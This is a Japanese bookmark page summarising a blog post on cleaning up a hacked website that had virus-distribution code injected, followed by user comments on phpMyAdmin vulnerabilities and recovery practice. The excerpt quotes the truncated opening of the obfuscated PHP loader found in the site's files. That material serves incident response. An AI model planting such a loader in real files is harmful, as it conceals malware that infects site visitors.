ウェブルの関連サービスが改竄された件で報告しました。今回はそれとは別で改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL... > このページを見る
最終更新時間:
2012年01月23日11時02分
みんなのブックマーク 人気(6) 新着
-
phpmyadminのプラグインに脆弱性があったことが原因なら、この対策例は無意味だと思う。 -
- こういうのを読むと、大手や公的なサイトが高価なCMSを選ぶ理由に改めて納得してしまう。
-
phpMyAdmin 狙いのあくせすなんて日常茶飯事だし別のも踏んでる可能性あるから断片を grep するよりはいったん全部消してまっさらな状況から再構築のがいいと思うのです・・・ (・x【みかん
- 結構ずさんな管理多いからな。まさか自分がねぇと思っているからダメなんですよ。
- つか、検索bot避けされてるのは(あたりまえだけど)発覚を遅らせるためなわけで、Webマスターツールでは防ぎきれない。実際問題、改ざん発覚即切り離し、staticで逃げるしかないよなぁ…てかphpMy本番で入れるの…
- 無知であることや、自分たちは大丈夫だろうという錯覚を持つことは、どちらも致命的なまでに危険。難攻不落のシステムとは、石橋をミサイル攻撃してから渡るほどの慎重さを持って作られる。
- ウェブ
-
障害対応の実際
-
レンタルサーバ、スキルも要らないし安い点は良いんだけど、FTP接続しか対応してなかったりphpMyAdminでDB管理させたりとなにかとアレなことが多いので、素直にスキル身に付けてさくらVPSとか運用したほうがよい。
- 結構ずさんな管理多いからな。まさか自分がねぇと思っているからダメなんですよ。
-
phpMyAdmin 狙いのあくせすなんて日常茶飯事だし別のも踏んでる可能性あるから断片を grep するよりはいったん全部消してまっさらな状況から再構築のがいいと思うのです・・・ (・x【みかん
-
調べ方は別に良いんだけど、こういう事は原因推測と再発防止策もセットで検討しないとあまり意味ないような。
-
あとで読む
- ウィルス対応
-
ぶくま…使うことはないようにしたいけども|脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて | ウェブル
-
脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて
-
冷静に、そして勇気を持って対処した運営者に敬意を表して
-
こわい








